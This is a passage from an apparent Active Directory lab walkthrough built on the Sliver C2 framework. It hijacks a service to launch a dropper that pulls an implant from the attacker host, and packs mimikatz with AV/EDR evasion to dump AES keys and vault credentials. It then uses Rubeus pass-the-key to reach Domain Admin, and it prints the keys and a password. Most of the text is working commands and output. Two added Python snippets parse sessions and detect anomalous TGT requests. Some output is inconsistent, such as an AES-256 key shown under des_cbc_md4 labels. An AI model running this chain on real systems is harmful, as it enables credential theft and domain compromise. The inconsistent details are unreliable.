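[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\svcadmin 1/11/2024 4:16:15 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\ciadmin 1/11/2024 4:19:40 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - DCORP-MGMT\SQLTELEMETRY 1/11/2024 4:16:15 AM (ciadmin)
[WinRM] Admin Success: DCORP-TEST.DOLLARCORP.MONEYCORP.LOCAL as ciadmin
[session] DCORP-TEST.DOLLARCORP.MONEYCORP.LOCAL - dcorp\ciadmin 1/11/2024 4:20:00 AM (ciadmin)
[+] Finished enumerating hosts
"""

# Assumption: the privileged accounts come from BloodHound (Domain Admins membership);
# the lab text identifies dcorp\svcadmin as a Domain Admin.
PRIVILEGED = {r"dcorp\svcadmin"}

ADMIN_RE = re.compile(r"^\[(?P<proto>\w+)\] Admin Success: (?P<host>\S+) as (?P<ctx>\S+)$")
SESSION_RE = re.compile(r"^\[session\] (?P<host>\S+) - (?P<user>\S+) (?P<when>.+?) \((?P<ctx>\S+)\)$")


def parse_lacheck(output: str) -> Tuple[Set[str], Dict[str, List[str]]]:
    """Return (hosts where we are local admin, host -> users with a session)."""
    admin_hosts: Set[str] = set()
    sessions: Dict[str, List[str]] = {}
    for raw in output.splitlines():
        line = raw.strip()
        m = ADMIN_RE.match(line)
        if m:
            admin_hosts.add(m.group("host").upper())
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.setdefault(m.group("host").upper(), []).append(m.group("user"))
    return admin_hosts, sessions


def session_targets(output: str, privileged: Set[str]) -> Dict[str, List[str]]:
    """Hosts where we are local admin and a privileged account has a session.

    Those are the boxes where looting LSASS can yield the privileged credential."""
    admin_hosts, sessions = parse_lacheck(output)
    wanted = {p.lower() for p in privileged}
    targets: Dict[str, List[str]] = {}
    for host in sorted(admin_hosts):
        hits = [u for u in sessions.get(host, []) if u.lower() in wanted]
        if hits:
            targets[host] = hits
    return targets


if __name__ == "__main__":
    for host, users in session_targets(SAMPLE, PRIVILEGED).items():
        print(host, "->", ", ".join(users))
```

Feeding the real run above through session_targets returns only DCORP-MGMT with dcorp\svcadmin, which is exactly the host compromised in the next section; the constructed DCORP-TEST host is dropped because the only session there belongs to the account we already control.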

Escalate privileges to Domain Admin: using dcorp-ci
Using Remote-sc-*, Sa-sc-enum, Scshell and PEzor
Interacting with or injecting into the LSASS process during credential looting is a major indicator of compromise, so tooling has moved towards creating a minidump of LSASS, exfiltrating it and parsing it offline with pypykatz or mimik atz on our own VM.

In this lab we focus on credential looting by interacting with LSASS directly, using C# mimikatz alternatives such as SharpKatz.

Start a tcp pivot listener in the dcorp-ci session.


[server] sliver (dcorp-ci_tcp) > pivots tcp --lport 443
[*] Started tcp pivot listener :443 with id 1

Generate a corresponding implant for dcorp-mgmt.


[server] sliver (dcorp-ci_tcp) > generate --tcp-pivot 172.16.3.11:443 -f shellcode -e -N dcorp-mgmt_tcp

[*] Generating new windows/amd64 implant binary


[*] Symbol obfuscation is enabled
[*] Build completed in 57s
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-mgmt_tcp.bin

Let us now enumerate remote services to abuse using the sa-sc-enum command (BOF).

[server] sliver (dcorp-ci_tcp) > sa-sc-enum dcorp-mgmt

[*] Successfully executed sa-sc-enum (coff-loader)

[*] Got output:

[.............snip..............]

SERVICE_NAME: wmiApSrv
DISPLAY_NAME: WMI Performance Adapter
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
SERVICE_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL

BINARY_PATH_NAME : C:\Windows\system32\wbem\WmiApSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WMI Performance Adapter
DEPENDENCIES :
SERVICE_START_NAME : localSystem
RESET_PERIOD (in seconds) : 900
REBOOT_MESSAGE :
COMMAND_LINE :
FAILURE_ACTIONS : RESTART -- Delay = 120000 milliseconds
FAILURE_ACTIONS : RESTART -- Delay = 300000 milliseconds
FAILURE_ACTIONS : NONE -- Delay = 0 milliseconds
The service has not registered for any start or stop triggers.

Let's target the wmiApSrv service and change the binary it executes to our NtDropper (the service's
binary path is modifiable). Upload the NtDropper binary as follows.

NOTE: Stop the wmiApSrv service before trying execution using scshell.

[server] sliver (dcorp-ci_tcp) > remote-sc-stop -t 40 dcorp-mgmt wmiApSrv

[*] Successfully executed remote-sc-stop (coff-loader)

[*] Got output:
stop_service:
hostname: dcorp-mgmt
servicename: wmiApSrv
SUCCESS.

[server] sliver (dcorp-ci_tcp) > upload -t 180 '/mnt/c/AD/Tools/NtDropper.exe' '\\dcorp-mgmt\c$\Windows\Temp\NtDropper.exe'

[*] Wrote file to \\dcorp-mgmt\c$\Windows\Temp\NtDropper.exe

We can use the scshell BOF as before for lateral movement.

[server] sliver (dcorp-ci_tcp) > scshell -t 80 dcorp-mgmt wmiApSrv 'C:\Windows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dcorp-mgmt_tcp.bin'

[*] Successfully executed scshell (coff-loader)

[*] Got output:
Trying to connect to dcorp-mgmt
Using current process context for authentication. (Pass the hash)
[snip]

[*] Session 945ae759 dcorp-mgmt_tcp - 172.16.100.X:49752->dcorp-mgmt_tcp->dcorp-ci_tcp-> (dcorp-mgmt) - windows/amd64 - Thu, 11 Jan 2024 05:28:27 PST


We can now perform credential dumping techniques to retrieve dcorp\ciadmin and other credentials.
Let's leverage PEzor to convert mimikatz.exe into donut shellcode with the appropriate mimikatz arguments
for credential dumping ("sekurlsa::ekeys"), repackaged into a .NET x86-x64 executable compatible with
Sliver's execute-assembly, with a few evasive techniques incorporated such as -sgn, -unhook, -antidebug
and -fluctuate=NA.

Spawn a new Ubuntu WSL prompt and execute PEzor.sh to convert mimikatz.exe into a repackaged .NET
x86-x64 executable:

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/PEzor/

wsluser@dcorp-studentX:/mnt/c/AD/Tools/PEzor$ sudo su
[sudo] password for wsluser: WSLToTh3Rescue!
root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::ekeys" "exit"'
________________
< PEzor!! v3.3.0 >
----------------
\ / \ //\
\ |\___/| / \// \\
/0 0 \__ / // | \ \
/ / \/_/ // | \ \
@_^_@'/ \/_ // | \ \
//_^_/ \/_ // | \ \
( //) | \/// | \ \
( / /) _|_ / ) // | \ _\
( // /) '/,_ _ _/ ( ; -. | _ _\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\ / ~-. _ .-~ .-~^-. \
(( /// )) `. { } / \ \
(( / )) .----~-.\ \-' .~ \ `. \^-.
///.----..> \ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
---------------------------------------------------------------------------
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "sekurlsa::ekeys" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.TIlIVd9TSn/shellcode.bin.donut"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

PEzor:
-z 2: donut args --> Pack/Compress the input file. 1=None, 2=aPLib
-sgn: Encode the generated shellcode with sgn
-unhook: User-land hooks removal
-antidebug: Add anti-debug checks
-fluctuate=NA: fluctuate to NOACCESS when sleeping
-format=dotnet: Outputs result in dotnet format
-p: parameters

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe

NOTE: We rename the generated file for ease of reusability in later objectives.

Dump logonpasswords/ekeys using mimikatz.exe.packed.dotnet.exe on the new dcorp-mgmt Sliver
session.

[server] sliver (dcorp-ci_tcp) > sessions -i 945ae759
[*] Active session dcorp-mgmt_tcp (945ae759)

[server] sliver (dcorp-mgmt_tcp) > ps

Pid Ppid Owner Arch Executable Session
====== ====== ============================== ======== ================== ====
[......snip......]
1204 596 dcorp\svcadmin x86_64 sqlservr.exe 0
2476 388 dcorp\mgmtadmin x86_64 taskhostw.exe 2

[server] sliver (dcorp-mgmt_tcp) > execute-assembly -P 1204 -p 'C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe' -t 180 /mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe

[*] Output:

.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

[snip]
mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 159488 (00000000:00026f00)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 1/15/2024 5:58:54 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8

We can also look for credentials from the credentials vault. Interesting credentials like those used for
scheduled tasks are stored in the credential vault. Use the mimikatz command: "vault::cred /patch".

Use PEzor back in the root Ubuntu terminal to convert mimikatz with the following arguments again.

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "vault::cred /patch" "exit"'

[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "vault::cred /patch" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.Z8CAXqRjUk/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-vaultcred.exe.packed.dotnet.exe

Execute the mimikatz-vaultcred.exe.packed.dotnet.exe binary in the dcorp-mgmt Sliver session as
before.

[server] sliver (dcorp-mgmt_tcp) > execute-assembly -P 1204 -p 'C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe' -t 180 /mnt/c/AD/Tools/PEzor/mimikatz-vaultcred.exe.packed.dotnet.exe

[*] Output:

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

588 {0;000003e7} 1 D 16588 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;00026f00} 0 D 655341 dcorp\svcadmin S-1-5-21-719815819-3726368948-3917688648-1118 (16g,25p) Primary
* Thread Token : {0;000003e7} 1 D 674982 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)

mimikatz(commandline) # vault::cred /patch

mimikatz(commandline) # exit
Bye!

We can now impersonate the domain admin credentials to move laterally using the Rubeus asktgt
module. We use the /ptt option to import the ticket into the current session. Switch back to the
dcorp-stdX session and perform the import.

NOTE: We can perform this in a sacrificial logon session using the make-token command, but for the sake of
simplicity we perform most ticket imports in our original session LUID.
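
With /opsec the AS-REQ is shaped like a normal Windows logon (AES key, pre-authentication), so on the DC the useful signal is context rather than the request itself: which host asks for a TGT for which account. The following is an added example, not code from the lab manual or Rubeus, that runs three checks over constructed Security Event ID 4768 records. The tier-0 account list, the admin subnet and the client addresses (172.16.100.1 stands in for the student VM)are assumptions for this example.

```python
"""Flag TGT requests (Security Event ID 4768) for privileged accounts from unexpected hosts.

Added example for this lab manual; not code from Rubeus, Sliver or the lab.
Records are constructed tab-separated Key=Value lines using 4768 field names
(TargetUserName, IpAddress, TicketEncryptionType, PreAuthType, Status).
"""
import ipaddress
from collections import defaultdict

# Assumptions for this example: the accounts that should only ever request
# TGTs from the admin subnet, and that subnet (dcorp-dc is 172.16.2.1).
TIER0_ACCOUNTS = {"administrator", "svcadmin", "srvadmin"}
ADMIN_SUBNET = ipaddress.ip_network("172.16.2.0/24")
RC4_ETYPE = "0x17"  # rc4-hmac; a downgrade from the AES keys used above


def parse_event(line):
    """Split a constructed 'Key=Value<TAB>Key=Value' record into a dict."""
    event = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def client_ip(event):
    """4768 logs IPv4 clients as ::ffff:a.b.c.d; normalise to an ip_address."""
    raw = event.get("IpAddress", "")
    if raw.lower().startswith("::ffff:"):
        raw = raw[7:]
    return ipaddress.ip_address(raw)


def analyse(lines):
    """Return findings as (rule, account(s), client_ip) tuples."""
    findings = []
    tier0_per_ip = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        # Only successful issuance matters here (Status 0x0); failed
        # pre-authentication is a separate, password-guessing signal.
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        account = ev.get("TargetUserName", "").lower()
        ip = client_ip(ev)
        if account in TIER0_ACCOUNTS:
            tier0_per_ip[ip].add(account)
            if ip not in ADMIN_SUBNET:
                findings.append(("tier0-tgt-from-non-admin-host", account, str(ip)))
        if ev.get("TicketEncryptionType", "").lower() == RC4_ETYPE:
            findings.append(("rc4-tgt", account, str(ip)))
    # One workstation collecting TGTs for several tier-0 identities is what
    # this lab produces (svcadmin, then srvadmin, both from dcorp-std).
    for ip, accounts in tier0_per_ip.items():
        if len(accounts) > 1:
            findings.append(("multiple-tier0-accounts-from-one-host",
                             ",".join(sorted(accounts)), str(ip)))
    return findings


def _rec(**fields):
    return "\t".join(f"{k}={v}" for k, v in fields.items())


# Constructed records; PreAuthType 2 is PA-ENC-TIMESTAMP, etype 0x12 is AES256.
SAMPLE_EVENTS = [
    _rec(EventID=4768, TargetUserName="svcadmin", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.2.1", TicketEncryptionType="0x12",
         PreAuthType=2, Status="0x0"),
    _rec(EventID=4768, TargetUserName="svcadmin", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.100.1", TicketEncryptionType="0x12",
         PreAuthType=2, Status="0x0"),
    _rec(EventID=4768, TargetUserName="srvadmin", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.100.1", TicketEncryptionType="0x12",
         PreAuthType=2, Status="0x0"),
    _rec(EventID=4768, TargetUserName="studentX", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.100.1", TicketEncryptionType="0x12",
         PreAuthType=2, Status="0x0"),
    _rec(EventID=4768, TargetUserName="studentX", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.100.5", TicketEncryptionType="0x17",
         PreAuthType=2, Status="0x0"),
    _rec(EventID=4768, TargetUserName="svcadmin", TargetDomainName="DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="krbtgt", IpAddress="::ffff:172.16.100.1", TicketEncryptionType="0x12",
         PreAuthType=2, Status="0x18"),
]

if __name__ == "__main__":
    for rule, who, ip in analyse(SAMPLE_EVENTS):
        print(f"{rule}: {who} from {ip}")
```

The first record (svcadmin from the DC itself) is the baseline and produces nothing; the second and third are the two asktgt calls this section performs from the student VM, and together they also trip the per-host rule.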

[server] sliver (dcorp-mgmt_tcp) > sessions -i 49cfa06f

[*] Active session dcorp-std_https (49cfa06f)

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[*] Output:

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : CMXYK90V
[*] Domain : WKIESTM5
[*] Password : HAB7FAYP
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2520
[+] LUID : 0xaab77

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBB[snip]

[*] Target LUID: 0xaab77
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.3 GiB)
==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 09 11:13:39 -0800 2024

[...........snip...........]

Analyze / purge imported tickets using the klist / purge options in Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

[*] Output:

[*] Action: Purge Tickets

Luid: 0x0
[+] Tickets successfully purged!


Escalate privileges to Domain Admin: via derivative admin
Using scshell, PEzor & Rubeus
Moving on to the next task, we need to escalate to domain admin using derivative local admin
access (via dcorp-adminsrv).

As noted earlier, dcorp\studentX has admin privileges over dcorp-adminsrv. Switch back to the
dcorp-stdX session and move laterally to dcorp-adminsrv as shown previously in Objective 5.
[*] Session 8f564dcc dcorp-adminsrv_tcp - 172.16.100.X:50152->dcorp-std_https-> (dcorp-adminsrv) - windows/amd64 - Tue, 16 Jan 2024 06:26:26 PST

[server] sliver (dcorp-std_https) > sessions -i 8f564dcc

[*] Active session dcorp-adminsrv_tcp (8f564dcc)

Enumerating privileges we find that we have SYSTEM privileges.

[server] sliver (dcorp-adminsrv_tcp) > whoami

Logon ID: NT AUTHORITY\SYSTEM

[*] Current Token ID: NT AUTHORITY\SYSTEM

We can now use the PEzor-generated mimikatz-ekeys.exe.packed.dotnet.exe binary from before to dump
logon passwords / AES keys (ekeys) on the target.

[server] sliver (dcorp-adminsrv_tcp) > ps

Pid Ppid Owner Arch Executable Session
====== ====== ================= ======== ================== ====
0 0 [System Process] -
[.......snip.......]
3392 796 NT AUTHORITY\SYSTEM x86_64 MoUsoCoreWorker.exe 0
3184 668 NT AUTHORITY\SYSTEM x86_64 dcorp-adminsrv_tcp.exe 0

[server] sliver (dcorp-adminsrv_tcp) > execute-assembly -P 3184 -p 'C:\windows\system32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe'

[*] Output:

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

540 {0;000003e7} 1 D 17297 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0000fa32} 0 D 398166 dcorp\appadmin S-1-5-21-1874506631-3219952063-538504511-1117 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 411322 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 225972 (00000000:000372b4)
Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 3/3/2023 2:42:41 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1115

* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728
[snip]


Switch back to the dcorp-stdX session and use Rubeus now to get a TGT with the AES hash of
dcorp\srvadmin.

[server] sliver (dcorp-adminsrv_tcp) > sessions -i 49cfa06f
[*] Active session dcorp-std_https (49cfa06f)

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:srvadmin /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /opsec /show /ptt'

[*] rubeus output:

[*] Action: Ask TGT

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsrvadmin
[*] Using aes256_cts_hmac_sha1 hash: 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\srvadmin'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF+AyNDAxMj[snip]

[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : srvadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/16/2024 1:34:44 AM
EndTime : 1/16/2024 11:34:44 AM
RenewTill : 1/23/2024 1:34:44 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : DgapjlJWNDAC2EsEE3okPT4S0ITKnCTtu+kP/zApFws=
ASREP (key) : 145019659E1DA3FB150ED94D510EB770276CFBD0CBD834A4AC331F2EFFE1DBB4

Find local admin access using LACheck as dcorp\srvadmin.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:servers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'

[*] Output:

[+] Parsed Aguments:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: False
/registry: False
/services: False
/ldap: servers-exclude-dc
/ou:
/socket:
/targets:
/threads: 10
/user: studentX@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 8
Status: (0.00%) 0 computers finished (+0) -- Using 24 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@dollarcorp.moneycorp.local
[WinRM] Admin Success: DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL as studentX@dollarcorp.moneycorp.local
[+] Finished enumerating hosts

Since dcorp\srvadmin has local admin access to dcorp-mgmt, we can move laterally onto dcorp-mgmt,
extract the credentials of dcorp\svcadmin as shown in the last section and gain domain admin
privileges.

Purge the ticket using Rubeus once done.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

[*] rubeus output:

[*] Action: Purge Tickets

Luid: 0x0
[+] Tickets successfully purged!


Learning Objective 8
• Extract secrets from the domain controller of dollarcorp.

• Using the secrets of krbtgt account, create a Golden ticket.

• Use the Golden ticket to (once again) get domain admin privileges from a machine.

Extract secrets from the domain controller of dollarcorp
Using PEzor, Rubeus and Remote-sc-*
In the dcorp-stdX session let us use the found credentials for dcorp\svcadmin to move laterally onto
dcorp-dc.

We can impersonate the domain admin credentials using the Rubeus asktgt module as in the previous
objective.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[*] Output:

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : CMXYK90V
[*] Domain : WKIESTM5
[*] Password : HAB7FAYP
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2520
[+] LUID : 0xaab77

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
